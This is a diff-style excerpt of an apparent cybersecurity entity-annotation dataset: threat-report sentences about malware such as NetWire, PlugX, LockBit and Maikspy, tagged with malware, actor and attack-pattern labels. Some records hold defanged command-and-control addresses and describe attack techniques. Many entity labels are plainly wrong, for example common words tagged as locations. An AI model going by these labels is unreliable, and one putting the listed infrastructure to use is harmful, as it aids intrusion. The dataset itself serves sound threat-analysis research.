page.","entities":[{"id":47027,"label":"SOFTWARE","start_offset":91,"end_offset":108},{"id":47028,"label":"DOMAIN","start_offset":168,"end_offset":180}],"relations":[],"Comments":[]} +{"id":10846,"text":"MSG_CONNECTIVITY","entities":[],"relations":[],"Comments":[]} +{"id":2258,"text":"While the malware lacked a large set of capabilities, it had a wealth of interesting and advanced features, such as the custom encryption\/encoding witnessed in the network traffic, the use of process hollowing against a randomly selected Microsoft Windows binary, and the downloading component that attempted to bypass network security measures by modifying the executable header.","entities":[{"id":47331,"label":"SOFTWARE","start_offset":238,"end_offset":255},{"id":47330,"label":"attack-pattern","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} +{"id":13212,"text":"Threat actors like Tropic Trooper can also use an invisible web shell to hide its C&C server location and make incident response tricky.","entities":[{"id":41203,"label":"location","start_offset":34,"end_offset":37},{"id":41204,"label":"attack-pattern","start_offset":60,"end_offset":69},{"id":41205,"label":"location","start_offset":102,"end_offset":105}],"relations":[],"Comments":[]} +{"id":4880,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across the industry.","entities":[],"relations":[],"Comments":[]} +{"id":1169,"text":" From edge case to systematic misclassifications, mutex usage is even more generally the canary in a coal mine than was previously realized. While tedious and time consuming, combing through mutex names did come with more than a few good laughs.","entities":[],"relations":[],"Comments":[]} +{"id":2213,"text":" While the link above shows a file extension of an image, the transferred file is in fact a modified executable file. The downloaded file has the first two bytes of the PE file format replaced with the characters \u2018DW\u2019, instead of the usual \u2018MZ\u2019.","entities":[],"relations":[],"Comments":[]} +{"id":14369,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} +{"id":3587,"text":"After inspection we noticed that this version of CyaX was similarly notable due to two characteristics.","entities":[{"id":49371,"label":"tools","start_offset":49,"end_offset":53}],"relations":[],"Comments":[]} +{"id":1237,"text":"A user can set a system-wide default SMS app as the only app with permission to send and receive SMS.","entities":[],"relations":[],"Comments":[]} +{"id":10963,"text":"APP was designed specifically for high-risk accounts.","entities":[],"relations":[],"Comments":[]} +{"id":5275,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} +{"id":13317,"text":"Spear-phishing emails, for instance, rely on baiting targets with socially engineered documents.","entities":[{"id":41445,"label":"location","start_offset":0,"end_offset":5},{"id":41446,"label":"attack-pattern","start_offset":6,"end_offset":14}],"relations":[],"Comments":[]} +{"id":1046,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) Today, Palo Alto Networks Unit 42 researchers are announcing details on a new high- severity vulnerability affecting the Google Android platform.","entities":[{"id":46537,"label":"identity","start_offset":60,"end_offset":98},{"id":46538,"label":"SOFTWARE","start_offset":174,"end_offset":197}],"relations":[],"Comments":[]} +{"id":1234,"text":"However, two months ago, WildFire discovered a new Android malware, Cardbuyer, that circumvents this verification technique.","entities":[{"id":46615,"label":"SOFTWARE","start_offset":25,"end_offset":33},{"id":46616,"label":"SOFTWARE","start_offset":51,"end_offset":58},{"id":46617,"label":"malware","start_offset":68,"end_offset":77}],"relations":[],"Comments":[]} +{"id":6169,"text":"After the attackers gain a foothold into the system \u2014 either through XSS injection or Service Worker \u2014 the next (and final part) of the attack chain, the exfiltration of the mailbox, is initiated.","entities":[{"id":19076,"label":"attack-pattern","start_offset":69,"end_offset":72},{"id":19077,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} +{"id":2834,"text":"This is likely due to increased uptake of the patch MS17-010 in light of the WanaCrypt0r attacks, as well as efforts made within the security community.","entities":[{"id":48043,"label":"malware","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} +{"id":8031,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} +{"id":13077,"text":"Cybercriminals have recently been focusing their efforts on the retail industry, launching ransomware-based attacks that could prove disastrous for businesses if it disrupts their operations during important shopping seasons.","entities":[],"relations":[],"Comments":[]} +{"id":13857,"text":"Outages have already started affecting motorists.","entities":[],"relations":[],"Comments":[]} +{"id":13011,"text":"We encourage any potential targets to enable Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} +{"id":3129,"text":"An easy thing you can do is restart your router once a week (typically by unplugging it).","entities":[],"relations":[],"Comments":[]} +{"id":8046,"text":"One of APT35\u2019s novel techniques involves using Telegram for operator notifications.","entities":[],"relations":[],"Comments":[]} +{"id":10897,"text":"Possible connections to StrongPity","entities":[{"id":33177,"label":"threat-actor","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} +{"id":4718,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50616,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":13118,"text":"That\u2019s why we\u2019re delighted to be a launch partner for new AWS Marketplace feature.","entities":[{"id":48902,"label":"SOFTWARE","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} +{"id":7371,"text":"Another variant executes a set of commands once a system is successfully compromised.","entities":[],"relations":[],"Comments":[]} +{"id":3120,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":3462,"text":"This can be an indication that these malware tools were developed by the same group.","entities":[],"relations":[],"Comments":[]} +{"id":4508,"text":"Spoofers may send forged messages using an organization\u2019s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} +{"id":1232,"text":"Previous attack cases, such as Zitmo and Cardbuyer, showed the risk of using SMS for payment authentication.","entities":[{"id":46613,"label":"malware","start_offset":31,"end_offset":36},{"id":46614,"label":"malware","start_offset":41,"end_offset":50}],"relations":[],"Comments":[]} +{"id":4326,"text":"The file is then loaded in memory via PowerShell.","entities":[{"id":50128,"label":"tools","start_offset":38,"end_offset":48}],"relations":[],"Comments":[]} +{"id":10001,"text":"Internal PlugX date dword value inside the printdat.dll file Mitigating supply chain attacks","entities":[{"id":30529,"label":"malware","start_offset":9,"end_offset":14},{"id":30530,"label":"location","start_offset":15,"end_offset":19},{"id":30531,"label":"location","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":1672,"text":"Upon receipt of a command from the server, a single function is called to decrypt the payload data and execute the received instruction.","entities":[],"relations":[],"Comments":[]} -{"id":1673,"text":"The value in the command byte determines which of the commands is run through a 76 way switch statement.","entities":[],"relations":[],"Comments":[]} -{"id":1674,"text":" A complete list of the possible commands available in NetWire was documented by CIRCL in April. The NetWire decoder uses data from a packet capture file to generate the client and server session keys then decode the remaining encrypted packets.","entities":[{"id":45092,"label":"malware","start_offset":55,"end_offset":62},{"id":45093,"label":"malware","start_offset":102,"end_offset":109}],"relations":[],"Comments":[]} -{"id":1675,"text":"The user needs to know the IP of the infected client, the port used by malware and the encryption password to properly decode the traffic.","entities":[],"relations":[],"Comments":[]} -{"id":1676,"text":"This password is set to “Password” by default, but can be retrieved from NetWire binaries if the attacker used something more secure.","entities":[{"id":4975,"label":"malware","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} +{"id":14364,"text":"Figure 21. Connection of Maikspy variants to 107[.]180[.]46[.]243 and hxxp:\/\/fakeomegle[.]com Figure 22. Connection of Maikspy variants to 198[.]12[.]149[.]13and hxxp:\/\/miakhalifagame[.]com\/","entities":[{"id":51779,"label":"URL","start_offset":163,"end_offset":191},{"id":51777,"label":"URL","start_offset":70,"end_offset":93},{"id":51781,"label":"malware","start_offset":120,"end_offset":127},{"id":51778,"label":"IPV4","start_offset":140,"end_offset":159},{"id":51780,"label":"malware","start_offset":25,"end_offset":32},{"id":44372,"label":"IPV4","start_offset":45,"end_offset":65}],"relations":[{"id":1161,"from_id":51780,"to_id":44372,"type":"communicates-with"},{"id":1162,"from_id":51780,"to_id":51777,"type":"communicates-with"},{"id":1163,"from_id":51781,"to_id":51778,"type":"communicates-with"},{"id":1164,"from_id":51781,"to_id":51779,"type":"communicates-with"}],"Comments":[]} +{"id":14030,"text":"We assume there are multiple developers within APT37, and not all of them follow the same practices.","entities":[{"id":47196,"label":"threat-actor","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} +{"id":14195,"text":"First comes continuous risk-based patching, multi-factor authentication, network monitoring, least privilege access, data encryption, phishing awareness training, and other cyber-hygiene steps.","entities":[],"relations":[],"Comments":[]} +{"id":1006,"text":"Some accounts advertised candidacy towards registration for student discount at retailers such as Amazon, BestBuy, Apple, and Dell.","entities":[{"id":46508,"label":"identity","start_offset":126,"end_offset":130},{"id":46507,"label":"identity","start_offset":115,"end_offset":120},{"id":46505,"label":"identity","start_offset":98,"end_offset":104},{"id":46506,"label":"identity","start_offset":106,"end_offset":113}],"relations":[],"Comments":[]} +{"id":4635,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":50555,"label":"malware","start_offset":0,"end_offset":11},{"id":14080,"label":"threat-actor","start_offset":25,"end_offset":40}],"relations":[],"Comments":[]} +{"id":12962,"text":"We haven\u2019t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} +{"id":20,"text":"The other list is of last week\u2019s campaign by the same attackers (exhaustive or close to it). Palo Alto Networks Enterprise Security Platform would have stopped this ransomware attack campaign thanks to the platform\u2019s unique integration between the network, endpoint and the cloud to maximize security.","entities":[{"id":45809,"label":"identity","start_offset":94,"end_offset":112}],"relations":[],"Comments":[]} +{"id":586,"text":" Highlights from the 2021 Unit 42 Ransomware Threat Report Ransomware Threat Assessments: A Companion to the 2021 Unit 42 Ransomware Threat Report Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":1956,"label":"identity","start_offset":26,"end_offset":33},{"id":1958,"label":"identity","start_offset":115,"end_offset":122}],"relations":[],"Comments":[]} +{"id":90,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":4276,"text":"Lately, they have been sending multiple RTF files exploiting CVE-2017-8570.","entities":[{"id":50077,"label":"vulnerability","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} +{"id":8552,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":26417,"label":"location","start_offset":10,"end_offset":14},{"id":26418,"label":"location","start_offset":89,"end_offset":95},{"id":26419,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} +{"id":2640,"text":" Palo Alto Networks customers receive protections against LockBit 2.0 attacks from Cortex XDR, as well as from the WildFire cloud-delivered security subscription for the Next-Generation Firewall.","entities":[{"id":47824,"label":"malware","start_offset":58,"end_offset":69},{"id":45640,"label":"identity","start_offset":1,"end_offset":19},{"id":45642,"label":"SOFTWARE","start_offset":83,"end_offset":93},{"id":45643,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} +{"id":5670,"text":"This past year, TAG has been collaborating with Google\u2019s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":17466,"label":"malware","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} +{"id":4633,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} +{"id":843,"text":" Privilege escalation attacks against the kernel have been around for some time and are well-known and can be well protected against. Kernel APC attacks however are a different class of attack.","entities":[{"id":2760,"label":"attack-pattern","start_offset":1,"end_offset":21},{"id":44889,"label":"attack-pattern","start_offset":135,"end_offset":153}],"relations":[],"Comments":[]} +{"id":8858,"text":"This variant of PlugX (detected by Trend Micro as Backdoor.Win32.PLUGX.DYSGUT), including the code in the BLOB, launches an svchost.exe process and injects to it.","entities":[{"id":27413,"label":"malware","start_offset":16,"end_offset":21},{"id":27415,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} +{"id":1521,"text":" If the first value in the packet is 0xCC then the file will set \"g_mainsrvinfo.srandipb\" and \"g_mainsrvinfo.srandipe\". If the first value in the packet is 0x33 the file will use tcp to download a file and execute it.","entities":[],"relations":[],"Comments":[]} +{"id":2286,"text":"Google is alleging violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, the Electronic Communications Privacy Act, the Lanham Act, and tortious interference of business relationships, and unjust enrichment.","entities":[{"id":45444,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":8084,"text":"Since first discovering this activity, OpenSUpdater's authors have tried other variations on invalid encodings to further evade detection.","entities":[{"id":25069,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} +{"id":7455,"text":"Overview of Pawn Storm\u2019s Yahoo credential phishing campaigns.","entities":[{"id":23176,"label":"attack-pattern","start_offset":42,"end_offset":50}],"relations":[],"Comments":[]} +{"id":5765,"text":"How MITRE ATT&CK Assists in Threat Investigation","entities":[],"relations":[],"Comments":[]} +{"id":7278,"text":"According to UTF-8 mapping, the related Unicode code is \"U+FE00\".","entities":[],"relations":[],"Comments":[]} +{"id":1624,"text":" Funtasy intercepts this message, parses out the PIN and sends it back to the registration server, completing the enrollment process.","entities":[],"relations":[],"Comments":[]} +{"id":4526,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations \u2013 in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} +{"id":6707,"text":"Our products are designed with robust built-in security features, like Gmail protections against phishing and Safe Browsing in Chrome, but we still dedicate significant resources to developing new tools and technology to help identify, track and stop this kind of activity.","entities":[{"id":20855,"label":"location","start_offset":13,"end_offset":16},{"id":20856,"label":"location","start_offset":47,"end_offset":55},{"id":20858,"label":"attack-pattern","start_offset":97,"end_offset":105},{"id":20859,"label":"location","start_offset":106,"end_offset":109},{"id":20860,"label":"threat-actor","start_offset":110,"end_offset":114},{"id":20861,"label":"location","start_offset":203,"end_offset":206},{"id":20862,"label":"location","start_offset":242,"end_offset":245},{"id":20863,"label":"malware","start_offset":246,"end_offset":250}],"relations":[],"Comments":[]} +{"id":1051,"text":" What our researchers have found is a vulnerability that can be used to more easily enable an \u201coverlay attack,\u201d a type of attack that is already known on the Android platform.","entities":[{"id":46543,"label":"SOFTWARE","start_offset":158,"end_offset":165}],"relations":[],"Comments":[]} +{"id":2906,"text":" The exploit uses the code above to restore the corrupted object and save the stack frame on the heap so that the process would not crash after the exploit is successful.","entities":[],"relations":[],"Comments":[]} +{"id":5231,"text":"We construe AnubisSpy to be linked to the cyberespionage campaign Sphinx (APT-C-15) based on shared file structures and command-and-control (C&C) server as well as targets.","entities":[{"id":51265,"label":"campaign","start_offset":65,"end_offset":83},{"id":51264,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} +{"id":3119,"text":" If you have any questions, please visit the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} +{"id":5980,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":18401,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} +{"id":4008,"text":"They also showed real-world implications that these vulnerabilities have.","entities":[],"relations":[],"Comments":[]} +{"id":574,"text":"One of the reasons Ryuk causes so much damage is because it will scan the local network and try to infect other machines through Server Message Block (SMB) protocols.","entities":[{"id":1919,"label":"malware","start_offset":19,"end_offset":23},{"id":46177,"label":"SOFTWARE","start_offset":129,"end_offset":155}],"relations":[],"Comments":[]} +{"id":4414,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} +{"id":13506,"text":"While the threat actor has been known to offer its services to a more general audience \u2014 as seen in its online advertisements in the underground \u2014 research from groups such as eQualit.ie and Amnesty International show that Void Balaur is likely also involved in attacks against higher profile victims, ranging from human rights activists and journalists to politicians and even presidential candidates.","entities":[{"id":51574,"label":"identity","start_offset":176,"end_offset":186},{"id":51575,"label":"identity","start_offset":191,"end_offset":213},{"id":51576,"label":"threat-actor","start_offset":223,"end_offset":234}],"relations":[],"Comments":[]} +{"id":4735,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50647,"label":"location","start_offset":89,"end_offset":109},{"id":50643,"label":"TIME","start_offset":3,"end_offset":7},{"id":50644,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50645,"label":"location","start_offset":66,"end_offset":71},{"id":50646,"label":"location","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} +{"id":12503,"text":"For a period of time, we observed thousands of instances of malicious Glupteba downloads per day.","entities":[{"id":38911,"label":"location","start_offset":16,"end_offset":20},{"id":38913,"label":"malware","start_offset":70,"end_offset":78},{"id":38914,"label":"location","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} +{"id":2117,"text":"Palo Alto Networks customers who have deployed the latest vulnerability signatures released on August 24, 2018, are protected.","entities":[{"id":47255,"label":"identity","start_offset":0,"end_offset":18},{"id":47256,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} +{"id":12364,"text":"As the course of the COVID-19 pandemic evolves, we\u2019ve seen threat actors evolve their tactics as well.","entities":[],"relations":[],"Comments":[]} +{"id":13539,"text":"The campaign initially compromised e-commerce online shops in Japan, Australia, and European countries via spam emails with malicious attachments.","entities":[{"id":51605,"label":"attack-pattern","start_offset":107,"end_offset":118},{"id":51606,"label":"campaign","start_offset":4,"end_offset":12},{"id":51607,"label":"identity","start_offset":35,"end_offset":58},{"id":51601,"label":"location","start_offset":62,"end_offset":67},{"id":51602,"label":"location","start_offset":69,"end_offset":78},{"id":51603,"label":"location","start_offset":84,"end_offset":92}],"relations":[{"id":1105,"from_id":51606,"to_id":51607,"type":"targets"},{"id":1106,"from_id":51607,"to_id":51601,"type":"located-at"},{"id":1107,"from_id":51607,"to_id":51602,"type":"located-at"},{"id":1108,"from_id":51607,"to_id":51603,"type":"located-at"},{"id":1110,"from_id":51606,"to_id":51605,"type":"uses"}],"Comments":[]} +{"id":4694,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} +{"id":10597,"text":"Exploiting CVE-2019-0676 enabled attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered.","entities":[],"relations":[],"Comments":[]} +{"id":308,"text":"This reconnaissance was then leveraged in brute force attacks against credentials, toward unauthorized access, implant installation, and subsequent exfiltration of consumer payment data.","entities":[{"id":1059,"label":"attack-pattern","start_offset":42,"end_offset":53},{"id":46007,"label":"attack-pattern","start_offset":111,"end_offset":131},{"id":46009,"label":"attack-pattern","start_offset":148,"end_offset":185},{"id":46008,"label":"attack-pattern","start_offset":90,"end_offset":109}],"relations":[],"Comments":[]} +{"id":13945,"text":"Maze was one of the first documented cases of this.","entities":[{"id":48760,"label":"malware","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} +{"id":3988,"text":"It also establishes a few recommendations for software customers and vendors to prevent and mitigate attacks as well as improve resilience against software supply chain attacks.","entities":[],"relations":[],"Comments":[]} +{"id":4888,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[{"id":50906,"label":"identity","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} +{"id":860,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":323,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":2039,"text":"What is peculiar about this file is it is a variant of the open-source MicroBackdoor, a backdoor allowing an attacker to browse the file system, upload and download files, execute commands and remove itself from the system (Figure 13).","entities":[{"id":47132,"label":"malware","start_offset":71,"end_offset":84}],"relations":[],"Comments":[]} +{"id":2943,"text":"The tactics and techniques are not new or sophisticated.","entities":[],"relations":[],"Comments":[]} +{"id":14009,"text":"Malware author\u2019s developer environment","entities":[],"relations":[],"Comments":[]} +{"id":3477,"text":"Contents of malicious SFX file used by Blackgear, posing as a Flash Player installer Figure 4. Malicious document used by Blackgear (top) and how VBScript is used to execute Marade (bottom)","entities":[{"id":49277,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":49278,"label":"SOFTWARE","start_offset":62,"end_offset":74},{"id":49279,"label":"threat-actor","start_offset":123,"end_offset":132},{"id":49280,"label":"malware","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} +{"id":5439,"text":"Sandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best.","entities":[{"id":51440,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":10567,"text":"In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018.","entities":[],"relations":[],"Comments":[]} +{"id":5414,"text":"The samples that we have analyzed are compiled for ARM and are dynamically linked against uClibc.","entities":[],"relations":[],"Comments":[]} +{"id":2342,"text":"They are the equivalent of LoadLibrary and GetProcAddress in Windows.","entities":[{"id":47399,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} +{"id":2638,"text":" Additionally, LockBit 2.0 has affected many companies globally, with top victims based in the U.S., Italy and Germany.","entities":[{"id":47820,"label":"malware","start_offset":15,"end_offset":26},{"id":47821,"label":"location","start_offset":95,"end_offset":99},{"id":47822,"label":"location","start_offset":101,"end_offset":106},{"id":47823,"label":"location","start_offset":111,"end_offset":118}],"relations":[],"Comments":[]} +{"id":13316,"text":"Nurture a culture of cybersecurity.","entities":[],"relations":[],"Comments":[]} +{"id":9606,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[{"id":29425,"label":"location","start_offset":0,"end_offset":6},{"id":29426,"label":"malware","start_offset":7,"end_offset":11}],"relations":[],"Comments":[]} +{"id":12588,"text":"For example, the payload we obtained contained a kernel module for capturing keystrokes.","entities":[],"relations":[],"Comments":[]} +{"id":7,"text":"The attacker used a polymorphic malware builder to generate malware with a unique hash for each victim, preventing signature-based solutions from detecting the new attacks before it was too late for the victim.","entities":[],"relations":[],"Comments":[]} +{"id":5268,"text":"Enforcing the principle of least privilege and implementing an app reputation system are just some of the best practices that can help mitigate threats.","entities":[],"relations":[],"Comments":[]} +{"id":13901,"text":"This is the riskiest step so far in the ransomware execution process, as data exfiltration is more likely to be noticed by the victim organization\u2019s security team.","entities":[],"relations":[],"Comments":[]} +{"id":2902,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 16)]","entities":[],"relations":[],"Comments":[]} +{"id":3490,"text":"bin","entities":[],"relations":[],"Comments":[]} +{"id":9406,"text":"Collection Capture Audio T1429 Used to record audio information Collection Capture SMS Messages T1412 Used to collect SMS messages","entities":[{"id":28955,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} +{"id":5423,"text":"But what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.","entities":[{"id":51430,"label":"malware","start_offset":28,"end_offset":41}],"relations":[],"Comments":[]} +{"id":7051,"text":"Structure of decrypted data.res file Lastly, the launcher starts a suspended process with the command line \u201cC:\\Windows\\system32\\svchost.exe -k LocalServices,\u201dand injects the appropriate shellcode into it (either 32- or 64-bit).","entities":[{"id":22104,"label":"location","start_offset":0,"end_offset":9},{"id":22105,"label":"identity","start_offset":223,"end_offset":226}],"relations":[],"Comments":[]} +{"id":10417,"text":"Users should also take full advantage of their network defense solutions by enhancing settings, especially for macro malware attached emails.","entities":[],"relations":[],"Comments":[]} +{"id":14380,"text":"A lot of the advanced security we\u2019ve been delivering on the last few years has been focused on this problem.","entities":[],"relations":[],"Comments":[]} +{"id":5409,"text":" The NCSC report covered malware targeting a specific vendor, namely WatchGuard.","entities":[{"id":51402,"label":"identity","start_offset":6,"end_offset":10},{"id":51403,"label":"identity","start_offset":70,"end_offset":80}],"relations":[],"Comments":[]} +{"id":14384,"text":"But most of EDR\u2019s capabilities are for endpoints they are on: ones they manage.","entities":[],"relations":[],"Comments":[]} +{"id":9425,"text":"It seems that this hard-coded key and flawed RC4 implementation were also used in a malware family named TigerPlug, probably because it spreads the PlugX malware.","entities":[{"id":29007,"label":"location","start_offset":19,"end_offset":23},{"id":29008,"label":"location","start_offset":34,"end_offset":37},{"id":29010,"label":"malware","start_offset":148,"end_offset":153}],"relations":[],"Comments":[]} +{"id":7151,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":1653,"text":"On July 22, Palo Alto Networks threat intelligence team, Unit 42, released our first report on the evolution of \u201cSilver Spaniel\u201d 419 scammers.","entities":[{"id":45085,"label":"identity","start_offset":12,"end_offset":55},{"id":45086,"label":"identity","start_offset":57,"end_offset":64},{"id":45089,"label":"TIME","start_offset":3,"end_offset":10},{"id":45087,"label":"malware","start_offset":113,"end_offset":127}],"relations":[],"Comments":[]} +{"id":9133,"text":"Lurk\u2019s infrastructure also exhibited new capabilities.","entities":[],"relations":[],"Comments":[]} +{"id":4212,"text":"The displayed Urdu text could be translated as \u201cReal women, girls, and housewives || Download the app now More than thousands of women app.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":3600,"text":"The Premium Plan requires payment and works automatically, while the Private Stub requires the user to contact the support from the service for further personalization.","entities":[],"relations":[],"Comments":[]} +{"id":13173,"text":"Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":2711,"text":" It is always important to view this type of critical vulnerability in the larger context of the threat landscape.","entities":[],"relations":[],"Comments":[]} +{"id":798,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":3539,"text":"Organizations can also consider managed detection and response, which provides in-depth threat analysis and correlation \u2014 from networks to servers and endpoints \u2014 to obtain a complete picture of and further understand a targeted attack.","entities":[],"relations":[],"Comments":[]} +{"id":2646,"text":" Like other ransomware families such as BlackByte, LockBit 2.0 avoids systems that use Eastern European languages, including many written with Cyrillic alphabets.","entities":[{"id":45646,"label":"malware","start_offset":51,"end_offset":62},{"id":45645,"label":"malware","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} +{"id":6197,"text":"The first involves injecting malicious code into the webpage via an XSS vulnerability on the webmail system.","entities":[{"id":19149,"label":"attack-pattern","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} +{"id":1663,"text":" The shortest possible packet is the \u201cHeartBeat\u201d command, which NetWire generates every 10 seconds.","entities":[{"id":46872,"label":"malware","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} +{"id":2524,"text":" These approaches are not particularly clever or sophisticated, but often they are effective.","entities":[],"relations":[],"Comments":[]} +{"id":4606,"text":"The solution allows you to see more and respond faster by collecting and correlating data across email, endpoints, servers, cloud workloads, and networks.","entities":[],"relations":[],"Comments":[]} +{"id":1238,"text":"However, other installed apps are still allowed to receive SMS and upload the content via Internet.","entities":[],"relations":[],"Comments":[]} +{"id":12311,"text":"We terminated 9 YouTube channels as part of our investigation into a coordinated influence operation linked to Egypt.","entities":[],"relations":[],"Comments":[]} +{"id":13565,"text":"The source code of this framework is shared across many Chinese public forums.","entities":[{"id":51646,"label":"location","start_offset":56,"end_offset":63},{"id":51647,"label":"tools","start_offset":24,"end_offset":33}],"relations":[{"id":1123,"from_id":51647,"to_id":51646,"type":"related-to"}],"Comments":[]} +{"id":2384,"text":"ScrambleCross receives instructions from its command-and-control (C&C) server that allow it to receive and manipulate plug-ins.","entities":[{"id":47449,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} +{"id":12505,"text":"While analyzing Glupteba binaries, our team identified a few containing a git repository URL: \u201cgit.voltronwork.com\u201d.","entities":[{"id":38916,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} +{"id":805,"text":"The impact of a successful credential theft is, ultimately, access and authorization.","entities":[{"id":46359,"label":"attack-pattern","start_offset":27,"end_offset":43}],"relations":[],"Comments":[]} {"id":1677,"text":"The usage for the tool is show below.","entities":[],"relations":[],"Comments":[]} -{"id":1678,"text":" At this time the tool works against the latest version of NetWire, 1.5c.","entities":[{"id":4979,"label":"malware","start_offset":59,"end_offset":66}],"relations":[],"Comments":[]} -{"id":1679,"text":"We hope this tool will be valuable to incident responders and others who are plagued by NetWire infections.","entities":[{"id":4985,"label":"malware","start_offset":88,"end_offset":95}],"relations":[],"Comments":[]} -{"id":1680,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1681,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1682,"text":"Unit 42 has recently been investigating a new malware family called Reaver.","entities":[{"id":46873,"label":"identity","start_offset":0,"end_offset":7},{"id":46874,"label":"malware","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1683,"text":"While we have identified it as being active since late 2016, Reaver has been used sparingly, with only a small number of unique samples identified.","entities":[{"id":45094,"label":"malware","start_offset":61,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1684,"text":"Its targets have been movements the Chinese government consider dangerous, also known as the “Five Poisons.”","entities":[{"id":46875,"label":"identity","start_offset":36,"end_offset":54}],"relations":[],"Comments":[]} -{"id":1685,"text":"We found that the Reaver malware family has shared command-and-control (C2) infrastructure overlap SunOrcal malware, and that these have been used concurrently since late 